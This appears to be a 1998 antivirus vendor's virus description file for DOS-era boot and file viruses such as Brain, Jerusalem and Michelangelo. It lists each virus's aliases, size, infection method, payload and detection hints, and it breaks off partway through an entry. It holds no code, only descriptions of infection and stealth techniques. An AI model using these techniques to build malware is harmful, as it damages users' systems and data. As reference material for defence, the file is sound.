PC User 1998 October

home *** CD-ROM | disk | FTP | other *** search

/ PC User 1998 October / Image.iso / utils / pccillan / DATA1.CAB / Program_Executable_Files / Common.vir < prev next >

Wrap

Text File | 1998-08-20 | 1.0 MB | 33,707 lines

Text Truncated. Only the first 1MB is shown below. Download the file for the complete contents. [(c)Brain] Virus Name: (c)Brain Alias Name: Pakistani, Clone, Nipper Virus Type: Boot Virus Virus Length: N/A Description: This virus infects boot sectors. When an infected file is executed, the virus installs itself into memory. Total available memory will decrease by 3-7 Kbytes. This virus moves the boot sector and replaces it with a copy of the virus. The original boot sector will be moved to another sector and marked as bad. This virus will also change the disk label to read: "(c) Brain" The following text is located in the virus: Welcome to the Dungeon (c) 1986 Basit & Amjad (pvt) Ltd. BRAIN COMPUTER SERVICES 730 NIZAB BLOCK ALLAMA IQBAL TOWN LAHORE-PAKISTAN PHONE :430791,443248,280530. Beware of this VIRUS.... Contact us for vaccination................. $#@%$@!! [555] Virus Name: 555 Alias Name: Dutch 555, Quit-199 Virus Type: File Virus Virus Length: 555 bytes Description: This virus infects *.COM and *.EXE files, as well as COMMAND.COM. When an infected file is executed, the virus installs itself into memory. Total available memory will decrease by 560 bytes. Once the virus is memory resident, it will infect *.COM and *.EXE files as they are executed. Infected files will increase in size by 555 bytes, with the virus being located at the end of the infected file. Infected files will have their date and time records updated to the date and time the infection occurred. [AirCop] Virus Name: AirCop Alias Name: Virus Type: Boot Virus Virus Length: N/A Description: This virus infects boot sectors. When a system is booted from a disk infected by the virus, the virus will install itself memory resident. Total system memory will decrease by 1,024 bytes. Once the virus is memory resident, all unprotected diskettes accessed will be infected. The virus will replace the floppy boot sector with a copy of itself. The virus will show the following message on infected systems: "Red State, Germ Offensive. AIRCOP." [Alameda] Virus Name: Alameda Alias Name: Alemeda Virus Type: Boot Virus Virus Length: N/A Description: This virus infects boot sectors. When the system is booted from a disk infected by the virus, the virus will install itself memory resident. Once the virus is memory resident, all unprotected 5-1/4" 360k diskettes will be infected when it activates through a warm boot (CTRL-ALT-DEL). (The virus remains in memory after a warm boot). [Ambulance] Virus Name: Ambulance Alias Name: Ambulance Car, RedX Virus Type: File Virus Virus Length: 796 bytes Description: This virus infects *.COM files. When an infected file is executed, the virus will attempt to infect one *.COM file. Other symptoms include displaying a moving ambulance at the bottom of the screen as well as playing the sound of a siren. [AntiEXE] Virus Name: AntiEXE Alias Name: D3, NewBug, CMOS4 Virus Type: Boot Virus Virus Length: N/A Description: This virus infects boot sectors. When the system is booted from a disk infected by the virus, the virus will install itself memory resident. Total available memory will decrease by 1,024 bytes. The virus will also overwrite the Master Boot Sector with a copy of the virus. Once the virus is memory resident, it will infect all unprotected diskettes. [Atomic] Virus Name: Atomic Alias Name: Virus Type: File Virus Virus Length: 371 bytes Description: This virus infects *.COM files. When an infected file is executed, the virus will infect the first two *.COM files located in the same directory. The virus will permanently overwrite the first 371 bytes of the files it infects. Date and time fields of infected files will not be altered. The virus will show the following message after infecting a file: "Bad command or file name" The following text string is located in the virus: "[TAD1A] Memory Lapse -- Toronto, CANADA" "The Atomic Dustbin 1A -- This is just the first step" "Bad command or file name" "*.COM .. c Dustbin 1A -- This is just the first step" [Austr_Parasite] Virus Name: Austr_Parasite Alias Name: Aussie Parasite Virus Type: File Virus Virus Length: 292 bytes Description: This virus infects *.COM files as well as COMMAND.COM. When an infected file is executed, the virus will install itself into memory. Total available memory will decrease by 320 bytes. Once the virus is memory resident, all executing *.COM files will be infected. Infected files will increase in size by 292 bytes, with the virus being located at the end of the infected file. Date and time records of infected files will not be altered. Symptoms include system hanging. The following text string is visible in the virus: "Australian Parasite" [Bljec] Virus Name: Bljec Alias Name: Black Jec Virus Type: File Virus Virus Length: 231-440 bytes Description: This virus infects *.COM files. When an infected file is executed, the virus will infect three *.COM programs in the same directory. Infected files will increase in size by 231-440 bytes, with the virus being located at the beginning of the infected file. Infected files will have their date and time records updated to the date and time the infection occurred. Symptoms include system hanging. [Butterfly] Virus Name: Butterfly Alias Name: Butterflies Virus Type: File Virus Virus Length: 302 bytes Description: This virus infects *.COM files. When an infected file is executed, the virus will infect all the *.COM files located in the same directory. Infected files will increase in size by 302 bytes, with the virus being located at the end of the infected file. Infected files will not have their date and time records altered. The following text string is located in the virus: "Goddamn Butterflies" "*.COM" [Connie] Virus Name: Connie Alias Name: Virus Type: File Virus Virus Length: 1,761 bytes Description: This virus infects *.COM files, as well as COMMAND.COM. When an infected file is executed, the virus installs itself into memory. Total available memory will decrease by 3,520 bytes. Once the virus is memory resident, it will infect *.COM files when they are executed, opened, or copied. Infected files will increase in size by 1,761 bytes, with the virus being located at the end of the infected file. The date and time information of infected files will not be altered. The following text string can be found in the virus: "This is <Connie> Written by Dark Slayer in Keelung TAIWAN P:\COMMAND.COM" [CVirus] Virus Name: CVirus Alias Name: Nowhere Man, VMessi Virus Type: File Virus Virus Length: Description: This virus infects *.COM and *.EXE files that are larger than 6,300 bytes in size. When an infected file is executed, the virus will search for a suitable file to infect (larger than 6,300 bytes in size). Infected files will have the first original 6,286 bytes overwritten by the virus. Date and time information of infected files will not be altered. Once a file is successfully infected, the following message will be displayed on the screen: "Out of memory" If infection is not possible, the following message will be displayed: "All files infected. Mission complete." The following text string can be found in the virus: "NMAN" "BMAN" "*.EXE" [DataLock] Virus Name: DataLock Alias Name: Datalock.920.A, V920 Virus Type: File Virus Virus Length: 920 bytes Description: This virus infects *.COM and *.EXE files. PC Vectors Hooked: INT 21h Infection method: When an infected file runs, the virus loads itself into memory. While loaded, it infects any file that executes. Infected files increase by 920 bytes. Damage: After August 1990, the virus won't allow files with the extension .?BF to be opened. When an attempt is made, it displays the erroneous error message "Too many files open." [Denzuko] Virus Name: Denzuko Alias Name: Den Zuk Virus Type: Boot Virus Virus Length: N/A Description: This virus infects boot sectors. Infection method: When the system attempts to boot from an infected diskette, the virus loads itself into memory--even if the boot fails. While loaded, the virus attempts to infect any accessed diskette. Damage: When <Ctrl><Alt><Del> is pressed, the message "Den Zuk" is displayed and the system seems to reboot. However, the virus remains in memory. Because the virus was designed for 360 KB diskettes, it unintentionally destroys data on 3.5 inch or 1.2 MB diskettes. [Die_Hard_2] Virus Name: Die_Hard_2 Alias Name: DH2 Virus Type: File Virus Virus Length: 4,000 bytes Description: This virus infects *.COM and *.EXE files. Interrupt vectors hooked: INT 21h Infection method: When an infected file runs, the virus loads itself into memory. While loaded, it infects accessed executable files. Infected files increase by 4,000 bytes. Damage: Under analysis [Dir] Virus Name: Dir Alias Name: DIR Virus Type: File Virus Virus Length: 691 bytes Description: See Dir-2 [Dir-2] Virus Name: Dir-2 Alias Name: Dir-II, Creeping Death Virus Type: File Virus Virus Length: 1,024 bytes Description: This virus infects *.COM and *.EXE files. PC Vectors Hooked: None Execution Procedure: 1) When the virus loads itself resident in memory it will change the directory structure data so that certain executable files are linked to itself. 2) This allows the virus to execute when you execute a file to which the DIR2-910 virus is linked to. At this point it can begin to infect other files. 3) The virus stays resident in memory but doesn't hook any interrupts. It uses another function to infect files. It infects .COM and .EXE files when they are "READ & WRITE". Damage: When all the .COM and .EXE files are infected on a disk, it will not be possible to execute any files from the disk. Detection Method: Check the disk by using "CHKDSK.EXE"; if some files are cross-linked to the same position, then these files must be infected. Note: DIR2-910 doesn't hook INT 24h when infecting files. It omits I/O errors (such as write protect). [Disk_Killer] Virus Name: Disk_Killer Alias Name: Ogre Virus Type: Boot Virus Virus Length: N/A Description: This virus infects boot sectors. Infection method: When the system is booted from an infected disk, the virus loads itself into memory. Damage: After the computer has been on for 48 hours, the virus displays the following message and then encrypts all the data on the hard disk: "Disk Killer -- Version 1.00 by COMPUTER OGRE 04/01/1989 Warning!! Don't turn off the power or remove the diskette while Disk Killer is Processing. Processing. Now you can turn off the power. I wish you luck." [EDV] Virus Name: EDV Alias Name: Cursy Virus Type: Boot Virus Virus Length: N/A Description: This virus infects boot sectors. When the system is booted from a disk infected by the virus, the virus will install itself into memory. Once the virus is memory resident, it will infect any accessed floppy disks. It will move the original boot sector, replacing it with a copy of the virus. Once the virus has infected six disks, it will disable the keyboard as well as corrupt all disks in the system. Once completed, the following message will be displayed on the screen: "That rings a bell, no? From Cursy" The following string can be found in infected boot sectors: "MSDOS Vers. E.D.V." [Exebug] Virus Name: Exebug Alias Name: Swiss Boot, CMOS killer Virus Type: Boot Virus Virus Length: N/A Description: This virus infects boot sectors. PC Vectors Hooked: INT 13h Infection method: When the system is booted from an Exebug infected diskette, the Exebug virus will install itself memory resident at the top of system memory but below the 640K DOS boundary, moving interrupt 12's return. Total system and available free memory will decrease by 1,024 bytes. Also at this time, the virus will infect the system hard disk's master boot sector. Damage: Master boot sector corruption; decrease in total system and available free memory; inability to access drive C: after diskette boot. [Fat_Table] Virus Name: Fat_Table Alias Name: Virus Type: File Virus Virus Length: 6,540 bytes Description: This virus infects *.EXE files. When an infected file is executed, the virus will infect one *.EXE file located in the same directory. The virus will overwrite the first 6,540 bytes of the original file. Date and time information of infected files will be updated to the time of infection. The following text string can be found in the virus: "hitohana" "karu ba" "rb C:\ * .* FAT TABLE E" "8RROR" "EXE" "COM" [Filler.A] Virus Name: Filler.A Alias Name: Filler Virus Type: Boot Virus Virus Length: N/A Description: This virus infects boot sectors. Infection method: When the system is booted from an infected floppy, the virus loads itself into memory. While loaded, it infects any accessed, non-protected disks. The DOS CHKDSK program will show a "total bytes memory" decrease of 8,192 bytes. Damage: Under analysis [Flip] Virus Name: Flip Alias Name: Virus Type: Boot Virus Virus Length: 2,672 bytes Description: This virus infects *.COM and *.EXE files. PC Vectors Hooked: INT 21h Infection Process: This virus spreads by executing an infected program or by booting the system with an infected disk. There are several methods of infection. 1) Infection of a clean system by an infected program. When an infected program is executed in a clean system, the virus will copy itself in the last side of the last cylinder, beginning from the 5th last sector to the 1st last sector and the virus will subtract the DOS boot sector at offset 0x13h (Number of logical sectors) with 6. Finally, the virus code is written onto the partition sector. 2) Spreading the infection through an infected disk. If a PC is booted from an infected disk, the spreading of the infection is complete. The boot code, previously overwritten by the virus on the disk partition sector, reads the main core of the virus from the last 5 sectors to the last sector, and loads it as a TSR in RAM, occupying 3 Kb of the higher part of system memory. As soon as it is installed as a TSR, the virus takes control of Int 1Ch (Timer Interrupt) to verify, with a frequency of 18.2 times per second, if the DOS COMMAND.COM is loaded. If DOS is present, the virus restores the timer and takes control of Int 21h. Damage: Loss of data stored in the 6th last to 1st last sectors of the disk. Virus also increases file sizes. Symptoms: Virus turns screen display upside down (rotates 180 degrees). File sizes increase by 2,153 bytes. Note: The virus uses a smart technique to avoid anti-virus detection programs, when modifying the partition sector, that is hooking int 01h, it will turn on a single step flag to get the original entry of DOS hooked of INT 13h . The virus will then move itself to the top of the MCB (memory control block), and decrease available memory in the MCB by 2672 (A70h) bytes. It will hook Int 21h with the same method as for INT 13h and then proceeds to run the original program. [Form.A] Virus Name: Form.A Alias Name: FORM, Form, Form 18, Generic Virus Type: Boot Virus Virus Length: N/A Description: This virus infects boot sectors. PC Vectors Hooked: INT 13h, INT 09h Infection method: When the system is booted from an infected diskette, the virus infects the DOS boot sector and loads itself into memory. While loaded, it infects any accessed, non-protected disks. The DOS CHKDSK program will indicate 653,312 bytes of free memory. Damage: On the 18th day of any month, the virus will emit a clicking sound whenever keys are pressed. The system may hang when a read error occurs, and parts of the original boot sector may be overwritten, making the partition unbootable. [Friday_13th] Virus Name: Friday_13th Alias Name: Friday the 13th, Virus 1813, Israelian, Jerusalem Virus Type: File Virus Virus Length: approx. 1,813 bytes Description: This virus infects *.COM and *.EXE files. PC Vectors Hooked: Int 21 Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident in memory it will infect any uninfected file that is executed. Damage: In the year 1987, the virus does no damage. It proceeds only to infect other files. Every Friday the 13th, excluding the year 1987, the virus deletes every executed program . All other days, excluding the year 1987, the virus spreads. About half an hour after the virus is installed in memory it scrolls up by two lines a small window with coordinates (5, 5), (16, 16) and slows down computer speed. Delay loop repeats 18.5 times per second. Detection Method: Increases the file length by 1813 bytes. Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [Frodo.Frodo.A] Virus Name: Frodo.Frodo.A Alias Name: 4096, IDF, 4096-1, Frodo, Frodo.Frodo.A, 100 Year Virus Type: File Virus Virus Length: 4,096 bytes Description: This virus infects *.COM and *.EXE files. PC Vectors Hooked: INT 21h, INT 13h Infection method: When an infected file runs, the virus loads itself in memory. While loaded, it infects accessed executable files. The virus increases the size of infected files by 4096 bytes. Damage: After September 21, the virus tries to modify the boot sector to display "FRODO LIVES." However, the virus code is corrupted, so instead of modifying the system areas, it crashes the system. Note: While the virus is in memory, it hides the increase in infected file sizes. [Generic_408] Virus Name: Generic_408 Alias Name: NYB, B1 Virus Type: Boot Virus Virus Length: N/A Description: This virus infects boot sectors. Infection method: When the system is booted from an infected diskette, the virus infects the master boot record and loads itself in memory. While loaded, it infects any accessed, non-protected disks. Damage: None known [Generic_437] Virus Name: Generic_437 Alias Name: Boot-437 Virus Type: Boot Virus Virus Length: N/A Description: This virus infects boot sectors. This virus will only infect hard drives when an attempt to boot from an infected diskette is made. Once the virus has infected the hard drive, all non-protected floppies used in the machine will be infected. Unlike most other boot sector viruses (except Form), Boot-437 infects the DOS boot sector on hard drives instead of the Master Boot Record. [GreenCat] Virus Name: GreenCat Alias Name: Green Caterpillar, Green_Caterpillar.1575.A, Find, 1591, 1575 Virus Type: File Virus Virus Length: 1,991 to 2,005 bytes Description: This virus infects *.COM and *.EXE files. PC Vectors Hooked: INT 21h Infection method: When an infected file runs, the virus loads itself in memory. Damage: After a specific time period has elapsed, the execution of an infected file causes a green caterpillar to run across the screen, excreting the screen contents as it goes. There is no permanent damage. [Grog31] Virus Name: Grog31 Alias Name: Grog 3.1 Virus Type: File Virus Virus Length: 1,200 bytes Description: This virus infects *.COM files as well as COMMAND.COM. When an infected file is executed, the virus installs itself into memory. Total available memory will decrease by 4,800 bytes. The virus will also infect COMMAND.COM. Once the virus is memory resident, it will infect *.COM files that are larger than 2,000 bytes when they are executed or opened. Infected files will increase in size by 1,200 bytes, with the virus being located at the beginning of the infected file. Date and time information of infected files will not be altered. The following text string can be found in the virus: "GROG 4EVER!" "GROG v3.1 (C) '93 by GROG - Italy" "Microsoft C:\COMMAND.COM" [Hacktic2] Virus Name: Hacktic2 Alias Name: Virus Type: File Virus Virus Length: 83 bytes Description: Infects *.COM and *.EXE files, including COMMAND.COM. When an infected file is executed, the virus will infect one file in the current directory, truncating the file size to 83 bytes as well as changing the file attribute to "hidden." The date and time information of infected files will be updated to the time of infection. [Hobbit] Virus Name: Hobbit Alias Name: Virus Type: File Virus Virus Length: 505 bytes Description: This virus infects *.EXE files. When an infected file is executed, the virus installs itself into memory. Total available memory will decrease by 1,440 bytes. Once the virus is memory resident, it will infect *.EXE when they are executed or opened. The virus will overwrite the first 505 bytes of the file. Date and time information of infected files will not be altered. The following text string can be found in the virus: "HOBIT" [Jerusalem] Virus Name: Jerusalem Alias Name: Israeli, Jerusalem.1808.Standard, 1808, Israeli, 1813 Jeru-3-3, Jerusalem.1808.Critical. Virus Type: File Virus Virus Length: 1,808 to 1,822 bytes Description: This virus infects *.COM and *.EXE files. PC Vectors Hooked: INT 21h, INT 08h Infection method: When an infected file runs, the virus loads itself in memory. While loaded, it infects any file that executes, except the COMMAND.COM file. The virus increases the size of .EXE files by 1,808-1,822 on the first infection and 1,808 bytes with each reinfection. Infected .COM files increase by 1,813 bytes. Damage: On Friday the 13th, after the virus has been resident for 30 minutes, it deletes files that are executed. On other days, the virus slows down the system 30 minutes after each infection. It also wipes out an area of the screen, though nothing is displayed. A bug in the virus can cause .EXE file to be infected repeatedly until they become too large to execute. [Joshi] Virus Name: Joshi Alias Name: Happy Birthday Joshi Virus Type: Boot Virus Virus Length: N/A Description: This virus infects boot sectors. Detection Method: The first "Joshi" virus was detected in India in June 1990. It is a very popular virus in India. Virus remains resident in the boot sector or in FAT area. Every January 5, the virus displays: "Type Happy Birthday Joshi." All will return to normal if the user types the above message. System memory decreases by 6KB when virus is resident. Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [Jumper] Virus Name: Jumper Alias Name: 2kb Virus Type: File Virus Virus Length: 2,048 bytes Description: This virus infects *.COM and *.EXE files and COMMAND.COM. When an infected file is first executed in a clean system, the virus will load itself into memory. Total memory will decrease by 8,336 bytes. Once the virus is memory resident, it will infect *.COM and *.EXE files as they are executed. Infected files will have a file length increase of 2,048 bytes. The date and time information of infected files will not be altered. The following text string is located in infected programs: "BIOS" [Junkie.A-1] Virus Name: Junkie.A-1 Alias Name: Junkie Virus Type: File Virus Virus Length: N/A Description: This virus infects *.COM and *.EXE files. PC Vectors Hooked: INT 1Ch, INT 21h Infection method: The first time an infected file runs, the virus overwrites the hard disk's master boot record. When the system is booted again (or when it is booted from an infected diskette), the virus loads itself in memory. While loaded, the virus infects any .COM file that executes and any accessed diskettes. The DOS CHKDSK program will show a "total bytes memory" decrease of 3,072 bytes. Infected files increase by just over 1,000 bytes. Damage: None known [K_Hate] Virus Name: K_Hate Alias Name: K-Hate Virus Type: File Virus Virus Length: 1,237 to 1,304 bytes Description: This virus infects *.COM files including COMMAND.COM. When an infected file is executed, the virus will infect all *.COM files in the same directory. Infected files will experience a file length increase of 1,237 to 1,304 bytes with the virus being located at the end of the file. Date and time information of infected files will not be altered. The following text string can be found in the virus: "CRYPT INFO" "KDG 0,5 / Khntark3" "*, K-HATE / Khntark*.COM" [Kampana.A] Virus Name: Kampana.A Alias Name: Telecom Boot, Campa, Anti-Tel, Brasil Virus Type: Boot Virus Virus Length: N/A Description: This virus infects boot sectors. PC Vectors Hooked: INT 13h Infection method: When the system is booted from an infected diskette, the virus loads itself in memory. While loaded, it infects any accessed disks. The DOS CHKDSK program will show a "total bytes memory" decrease of 1,024 bytes. Damage: After a number of reboots, the virus overwrites sectors of the hard disk. Note: If you attempt to examine the master boot record while the virus is loaded, it will display the original, uninfected version. [KeyKapture] Virus Name: KeyKapture Alias Name: KeyKap, Hellspawn.1 Virus Type: File Virus Virus Length: 1,074 bytes Description: Infects *.EXE files by creating a hidden *.COM file of the same name in the same directory. When an infected file is executed, the virus installs itself into memory. Total available memory will decrease by 3,072 bytes. Once the virus is memory resident, it will infect *.EXE when they are executed by creating a 1,074 byte *.COM file of the same name. The original *.EXE file will not be changed in any way. Infected systems may experience system hangs. The following text string can be found in the virus: "KKV.90 KeyKapture Virus v0.90 [Hellspawn-II] (c) 1994 by Stormbringer [PS]" [MacGyver] Virus Name: MacGyver Alias Name: Virus Type: File Virus Virus Length: 2,824 bytes Description: This virus infects *.EXE files. Infection method: When the infected program is executed, the MacGyver virus will install itself memory resident as a low system memory TSR of 3,072 bytes. When the MacGyver virus is memory resident, it will infect .EXE programs when they are executed or opened. The following text string is visible within the MacGyver viral code in all infected programs: "SCANVIR.SHW" Damage: It may cause frequent system hangs when .EXE programs are executed. The DOS CHKDSK program will indicate file allocation errors on all infected files when the virus is memory resident. [Metal_Militia] Virus Name: Metal_Militia Alias Name: MMIR, Immortal Riot Virus Type: File Virus Virus Length: 282 bytes Description: This virus infects *.COM files, as well as COMMAND.COM. When an infected file is executed, the virus installs itself into memory. Total available memory will decrease by 3,072 bytes. Once the virus is memory resident, it will infect *.COM files when they are executed. Infected files will increase in size by 1,054-5 bytes, with the virus being located at the beginning of the infected file. Date and time information of infected files will not be altered. The following text string can be found in the virus: "Senseless Destruction..." "Protecting what we are joining together to take on the world.." "METAL MiLiTiA [iMMORTAL RIOT] SVW" [Michelangelo] Virus Name: Michelangelo Alias Name: Virus Type: Boot Virus Virus Length: N/A Description: This virus infects disk boot sectors. When the system is booted from a disk infected with the Michelangelo virus, the virus will install itself into memory. Total available memory will decrease by 2,048 bytes. Once the virus is memory resident, it will infect diskette boot sectors on access. The virus will move the original boot sector and replace it with a copy of the virus. This virus activates on March 6. It will format the hard disk, overwriting all existing data. [Monkey] Virus Name: Monkey Alias Name: Stoned.Empire.Monkey.B, Monkey 2 Virus Type: Boot Virus Virus Length: N/A Description: This virus infects boot sectors. Infection method: When the system is booted with an infected diskette, the virus loads itself in memory. While loaded, it infects any accessed, non-protected disks. The DOS CHKDSK program will show a "total bytes memory" decrease of 1,024 bytes. Monkey-1 is one of the few viruses that can successfully infect floppies while Microsoft Windows is running. Damage: The virus encrypts the partition table of the master boot record. If you attempt to boot from a clean floppy, the disk will be inaccessible because the partition table has been moved. Note: If you attempt to examine the master boot record while the virus is in memory, it will display the original, uninfected version. Caution: Do not use FDISK /MBR to clean this virus. [Mummy] Virus Name: Mummy Alias Name: Virus Type: File Virus Virus Length: 1,300 - 1,503 bytes Description: This virus infects *.EXE files. Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident in memory it will infect any uninfected file that is executed. Damage: This virus has several variants. While some variants have no damage routine, some will slow down the system performance and variants of the Mummy virus will have a Random Number counter. When the counter reaches zero, the virus will overwrite the first part of the hard disk and cause severe data loss. Detection Method: Increases infected file size by 1,300-1,503 bytes. Virus occasionally hangs the system when the virus is resident in memory. Encrypted text strings inside the virus code: "Mummy Version x.xxx", "Kaohsiung Senior School", "Tzeng Jau Ming presents", "Series Number=[xxxxx]." Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [Natas] Virus Name: Natas Alias Name: Satan, Sat_Bug.Natas, Natas-4, Natas-6 Virus Type: File Virus Virus Length: 4,746 bytes Description: This virus infects *.COM and *.EXE files. PC Vectors Hooked: INT 13h, INT 21h Infection method: When the system is booted with an infected disk, the virus loads itself in memory and infects the master boot record. While loaded, it infects any accessed executable files or diskettes. Total system memory decreases by 5,664 bytes. Infected files increase in length by 4,744 bytes. Damage: The virus formats the hard disk and destroys data stored on diskettes. [No_of_Beast] Virus Name: No_of_Beast Alias Name: No. of the Beast, Number_of_the_Beast.E, DARTH, 666, 512 Virus Type: File Virus Virus Length: 512 bytes Description: This virus infects *.COM files. PC Vectors Hooked: INT 13h, INT 21h Infection method: When an infected file runs, the virus loads itself in the memory. While loaded, it infects accessed .COM files. The virus overwrites the first 512 bytes of the files it infects, but stores the original data in free space at the end of the file. Damage: If an infected file is copied, some of its original data could be destroyed. Note: If you attempt to examine an infected file while the virus is in memory, it will display the original, uninfected version. [Nop] Virus Name: Nop Alias Name: Nops, Stealth_Boot Virus Type: Virus Length: Description: See Stealth_Boot.C [Nov_17th] Virus Name: Nov_17th Alias Name: November 17th Virus Type: File virus Virus Length: 885 bytes Description: This virus infects *.COM and *.EXE files. Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident in memory it will infect any uninfected file that is executed. Damage: On any day between November 17 and 30, the virus destroys the first 8 sectors of the current disk. Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [One_half] Virus Name: One_half Alias Name: Virus Type: File Virus Virus Length: 3,544 bytes Description: Infects *.COM and *.EXE files as well as COMMAND.COM. PC Vectors Hooked: INT 21h Infection method: When an infected file runs, the virus loads itself in memory. While loaded, it infects any accessed executable files or boot sectors. The DOS CHKDSK program will show a "total bytes memory" decrease of 4,096 bytes. Infected .COM and .EXE files increase by 3,544 bytes. Damage: Under analysis Note: If you attempt to examine the hard drive while the virus is in memory, it will display the original, uninfected version. [Ontario] Virus Name: Ontario Alias Name: Virus Type: File virus Virus Length: 512 bytes Description: Infects *.COM, *.EXE and overlay files, as well as COMMAND.COM. When an infected file is executed, the virus installs itself into memory. Total available memory will decrease by 2,048 bytes. The virus will also infect COMMAND.COM increasing it's size by 512 bytes. Once the virus is memory resident, it will infect files when they are executed. Infected files will increase in size by 512 - 1,023 bytes depending on the type of file. [Parity_boot.b] Virus Name: Parity_Boot.B Alias Name: Parity_BOOT.B, Generic1 Virus Type: Boot Virus Virus Length: N/A Description: This virus infects boot sectors. PC Vectors Hooked: INT 13h Infection method: When the system is booted from an infected diskette, the virus infects the master boot record and loads itself in memory. While loaded, it infects all accessed, non-protected disks. The DOS CHKDSK program will show a "total bytes memory" decrease of 1,024 bytes. Damage: The virus sets a one-hour delay timer when the system is turned on. Each time a floppy is infected, the timer is reset. If no floppies are infected, the virus simulates a parity error, displaying the following message and hanging the system: Parity Check Note: If you attempt to examine boot sectors while the virus is in memory, it will display the original, uninfected version. [Readiosys] Virus Name: Readiosys Alias Name: AntiCMOS, Lenart Virus Type: Boot Virus Virus Length: N/A Description: This virus infects boot sectors. When the system is booted from an infected hard disk, the virus loads itself in memory. After loading successfully, it infects most accessed disks. The DOS CHKDSK program will show a "total bytes memory" decrease of 2,048 bytes. This virus may change the CMOS settings, depending on the system hardware. In many cases, the system will hang before the virus can finish loading into memory. [Ripper] Virus Name: Ripper Alias Name: Jack Ripper Virus Type: Boot Virus Virus Length: N/A Description: This virus infects boot sectors. Infection method: The virus is loaded in memory when the system is booted from an infected diskette. While loaded, the virus infects any accessed, non-protected disks. Damage: The virus corrupts the hard disk over time by randomly selecting disk writes (approximately 1 per 1000) and swapping two words in the write buffer. Note: If you attempt to examine the infected boot sectors while the virus is in memory, it will display the original, uninfected version. [Slayer] Virus Name: Slayer Alias Name: 5120, Vbasic Virus Type: File Virus Virus Length: 5,120 bytes Description: This virus infects *.COM and *.EXE files. When an infected file is executed, the virus will infect all *.COM and *.EXE files located in the same directory. Infected files will increase in size from 5,120 to 5,135 bytes with the virus being located at the end of the file. Date and time information of infected files will not be altered. [Squisher] Virus Name: Squisher Alias Name: Tiny Hunter Virus Type: File Virus Virus Length: 340 bytes Description: Infects *.COM files, as well as COMMAND.COM. When an infected file is executed, the virus installs itself into memory. Total available memory will not change. Once the virus is memory resident, it will infect *.COM files that contain more than 340 bytes of hex '00' characters when they are executed. Infected files will not experience an increase in size. Date and time information of infected files will not be altered. [Stealth_Boot.C] Virus Name: Stealth_Boot.C Alias Name: Amse, Nops, STELBOO, STB Virus Type: Boot Virus Virus Length: N/A Description: This virus infects boot sectors. PC Vectors Hooked: INT 13h Infection method: When the system is booted from an infected diskette, the virus loads itself in memory and infects the master boot record. While loaded, it infects any accessed, non-protected diskettes. The DOS CHKDSK program will show a "total bytes memory" decrease of 4,000 bytes. Damage: No intentional damage Note: If you attempt to examine the infected hard disk sectors while the virus is in memory, it will return a zero-filled buffer. [Stoned] Virus Name: Stoned Alias Name: Marijuana, New Zealand, Stoned.Standard.A Virus Type: Boot Virus Virus Length: N/A Description: This virus infects boot sectors. PC Vectors Hooked: INT 13h Infection method: When the system is booted from an infected floppy, the virus loads itself in memory and infects the hard disk. While loaded, it infects any accessed diskettes. The DOS CHKDSK program will show a "total bytes memory" decrease of 2,048 bytes. Damage: No intentional damage. Displays the text string: "Your PC is now Stoned!" [Stoned.Azusa] Virus Name: Stoned.Azusa Alias Name: Azusa, Hong Kong Virus Type: Boot Virus Virus Length: N/A Description: This virus infects boot sectors. PC Vectors Hooked: INT 13h Infection method: When a system is booted from an infected disk, the virus loads itself in memory. While loaded, it attempts to infect any accessed disks. Unlike most boot sector viruses, it does not preserve a copy of the original master boot record. Instead it overwrites it and takes over its functions. The DOS CHKDSK program will show a "total bytes memory" decrease of 1,024 bytes. Damage: After a specified number of reboots, the virus temporarily disables the serial and parallel ports. [Sunday-1] Virus Name: Sunday-1 Alias Name: Virus Type: File Virus Virus Length: 1,636 bytes Description: Infects *.COM and *.EXE files as well as overlay files. Damage: On Sunday, the virus may damage the FAT table. It will also display the following message: "Today is Sunday! Why do you work so hard? All work and no play makes you a dull boy! Come on! Let's go out and have some fun!" [Taiwan] Virus Name: Taiwan Alias Name: Taiwan 2 Virus Type: File Virus Virus Length: 743 bytes Description: Infects *.COM files, including COMMAND.COM. When an infected file is executed, the virus will attempt to infect three *.COM files starting from C:\. Infected files will increase in size by 743 bytes with the virus being located at the beginning of the file. The virus is activated on the 8th of any month when it will overwrite the FAT table and root directory. [Telecom] Virus Name: Telecom Alias Name: Telefonica Virus Type: File Virus Virus Length: 3,700 bytes Description: This virus infects *.COM files. When an infected file is executed, the virus installs itself into memory. Total available memory will decrease by 3,984 bytes. Once the virus is memory resident, it will infect *.COM files that are larger than 1,000 bytes when they are executed. Infected files will increase in size by 3,700 bytes. Date and time information of infected files will be altered with 100 being added to the year. [Tequila] Virus Name: Tequila Alias Name: Stealth Virus Type: File Virus Virus Length: 2,468 bytes Description: Infects *.EXE files as well as boot sectors. PC Vectors Hooked: INT 13h, INT 21h Infection method: The first time an infected file runs, the virus infects the master boot record. When the system is booted from the infected hard disk, the virus loads itself in memory. While loaded, it infects any .EXE file that executes. The DOS CHKDSK program will show a "total bytes memory" decrease of 3,072 bytes. Infected .EXE files increase by 2,468 bytes. The virus won't infect files starting with "V" or "SC." Damage: Several months after the initial infection, the virus becomes active. Each month afterward, if an infected program is run on the same day of the first infection, a graphic and this message will be displayed. Welcome to T.TEQUILA'S latest production. Contact T.TEQUILA/P.o.Box 543/6312 St'hausen/Switzerland Loving thoughts to L.I.N.D.A BEER and TEQUILA forever ! Note: The virus hides the infected partition record and increases the size of infected files. [Traveller] Virus Name: Traveller Alias Name: Bupt Virus Type: File Virus Virus Length: 1,220 to 1,237 bytes Description: Infects *.COM and *.EXE files, as well as COMMAND.COM. When an infected file is executed, the virus installs itself into memory. Total available memory will decreased by 1,840 bytes. Once the virus is memory resident, it will infect *.COM and *.EXE files when they are executed. This virus will also infect when the DIR command is used. Infected files will increase in size by 1,220 to 1,237 bytes, with the virus being located at the end of the infected file. Date and time information of infected files will not be altered. The following text string can be found in the virus: "Traveller (C) BUPT 1991.4" "Don't panic I'm 